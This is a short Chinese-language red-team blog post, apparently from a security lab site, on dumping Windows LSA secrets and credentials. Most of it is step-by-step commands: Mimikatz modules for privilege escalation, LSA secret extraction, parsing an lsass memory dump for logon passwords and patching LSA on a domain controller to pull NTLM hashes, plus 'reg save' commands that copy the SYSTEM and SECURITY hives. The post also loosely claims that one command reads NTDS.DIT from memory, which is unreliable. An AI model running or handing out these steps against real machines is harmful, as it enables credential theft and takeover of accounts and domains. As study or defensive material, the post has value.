LSA转储

7 months ago

red.ghostwolflab.com

1 minute

LSA是本地安全机构（Local Security Authority）的缩写，它是Windows操作系统中负责验证用户身份和强制本地安全策略的核心组件。LSA包含本地安全机构服务器服务（LSASS）进程，它管理着微软账号和Azure相关的密码和令牌等必要的系统凭证

模拟令牌转储

在Mimikatz中执行以下命令即可转储LSA：

privilege::debug
token::elevate
lsadump::secrets

首先在cmd中输入以下命令以转储注册表：

reg save HKLM\SYSTEM system
reg save HKLM\security security

接着在Mimikatz中输入以下命令即可提取HASH：

 privilege::debug
 lsadump::secrets /system:c:\Users\snowwolf\Desktop\system /security:c:\Users\snowwolf\Desktop\security

在Windows主机中打开任务管理器查找lsass.exe进程并右键创建转储文件即可：

现在启动Mimikatz并输入以下命令即可提取HASH：

privilege::debug
sekurlsa::minidump C:\Users\snowwolf\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

在Windows 10 和 Windows 11 版本，该进程更改为如下图所示：

lsadump::lsa /patch命令是专用于在域控制器上导出用户密码或哈希的命令，它可以绕过LSA保护，直接从内存中读取NTDS.DIT文件的内容。

在Mimikatz中执行以下命令即可提取：

privilege::debug
lsadump::lsa /patch

我们可以看到域名、SysKey、本地SID、SAMKey等信息，以及每个用户的RID、用户名和NTLM哈希值

当然，还有其它方法提取，比如转储Lsass且不使用Mimikatz。